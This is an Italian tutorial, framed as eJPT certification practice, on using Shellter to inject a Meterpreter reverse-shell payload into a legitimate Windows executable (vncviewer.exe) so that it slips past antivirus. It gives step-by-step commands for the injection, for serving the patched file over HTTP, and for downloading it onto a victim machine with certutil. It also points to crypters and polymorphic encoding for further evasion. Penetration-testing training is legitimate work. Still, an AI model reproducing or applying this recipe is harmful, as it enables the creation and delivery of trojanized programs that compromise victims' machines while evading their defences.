Tutorials

AV Evasion with Shellter

In questa guida approfondita parleremo di AV Evasion con Shellter, uno strumento efficace per iniettare payload in eseguibili Windows e generare malware fileless per bypassare gli antivirus. Questa te

#exploitation#post-exploitation#windows

AV Evasion with Shellter

In questa guida approfondita parleremo di AV Evasion con Shellter, uno strumento efficace per iniettare payload in eseguibili Windows e generare malware fileless per bypassare gli antivirus. Questa tecnica è fondamentale nel contesto dell'eLearnSecurity eJPT e nelle simulazioni di attacchi reali.

📌 Cos’è Shellter?

Shellter è uno strumento avanzato di iniezione dinamica per eseguibili Windows (PE), progettato per iniettare payload (es. reverse shell) in un eseguibile esistente. Utilizza metodi di dynamic shellcode injection e tecniche avanzate di offuscamento, rendendo difficile per gli antivirus individuarlo.

🛠️ Installazione su Linux

Shellter è un eseguibile Windows e per eseguirlo su Linux avremo bisogno di Wine:

bash
sudo apt install shellter -y
sudo apt install wine32 -y

Il binario di Shellter si trova nella directory:

bash
/usr/share/windows-resources/shellter/

Avviamo Shellter con Wine:

bash
sudo wine shellter.exe

📂 Preparazione del PE (Portable Executable)

1. Individua un eseguibile "innocuo" su cui iniettare il payload. Ad esempio:

bash
/usr/share/windows-binaries/vncviewer.exe

2. Copialo in una directory comoda per lavorare.

bash
cp /usr/share/windows-binaries/vncviewer.exe ~/shellter-work/
cd ~/shellter-work

3. Avvia Shellter e scegli il mode A (Auto):

bash
sudo wine shellter.exe
  • Quando richiesto, seleziona:
- Operation mode: A (Automatic) - Path del PE: ~/shellter-work/vncviewer.exe - Payload da iniettare: Seleziona una reverse shell e configura LHOST e LPORT

🎯 Considerazioni e Tecniche Avanzate

Offuscamento: Shellter modifica il flusso del PE e offusca il payload per eludere signature-based detection degli AV.

Utilizzo di Payload Personalizzati: Puoi creare il tuo shellcode personalizzato, ad esempio generato con Metasploit (msfvenom) e iniettarlo con Shellter.

Payloads comuni:

  • Windows Reverse TCP (windows/meterpreter/reverse_tcp)
  • Windows Reverse HTTPS (windows/meterpreter/reverse_https)

Esecuzione Invisibile: Il PE continua a funzionare normalmente (ad esempio, VNC si avvia), mentre il payload si esegue in background.

🚀 Trasferimento e Esecuzione sulla Vittima

Trasferisci il nuovo eseguibile generato (ad esempio vncviewer_patched.exe) sulla macchina target.

Esempio per il trasferimento:

1️⃣ Avvia un server HTTP sulla tua macchina Kali:

bash
sudo python3 -m http.server 8000

2️⃣ Scarica l’eseguibile dalla macchina target:

powershell
certutil -urlcache -f http://192.168.1.2:8000/vncviewer_patched.exe vncviewer_patched.exe

3️⃣ Esegui l’eseguibile sulla macchina target. Quando avvierà il programma, contemporaneamente si attiverà il payload e riceverai la shell.

⚠️ Best Practice e Note Importanti

🔒 Utilizzare sempre ambiente di test e VM isolate per simulare AV evasion.

💡 Attenzione agli AV moderni: anche se Shellter è efficace, molti AV aggiornati hanno tecniche di behavioral analysis e sandboxing. Considera l’uso di tecniche aggiuntive:

  • Obfuscation del payload (msfvenom + encoding)
  • Generazione di payload polimorfi
  • Utilizzo di crypter

🔍 Analisi del PE generato: Puoi verificare le modifiche del PE usando strumenti come PEStudio, die, strings, Dependency Walker.

🔄 Alternativa a Shellter: strumenti come Veil, TheFatRat, Unicorn possono essere utilizzati per simili tecniche di AV evasion.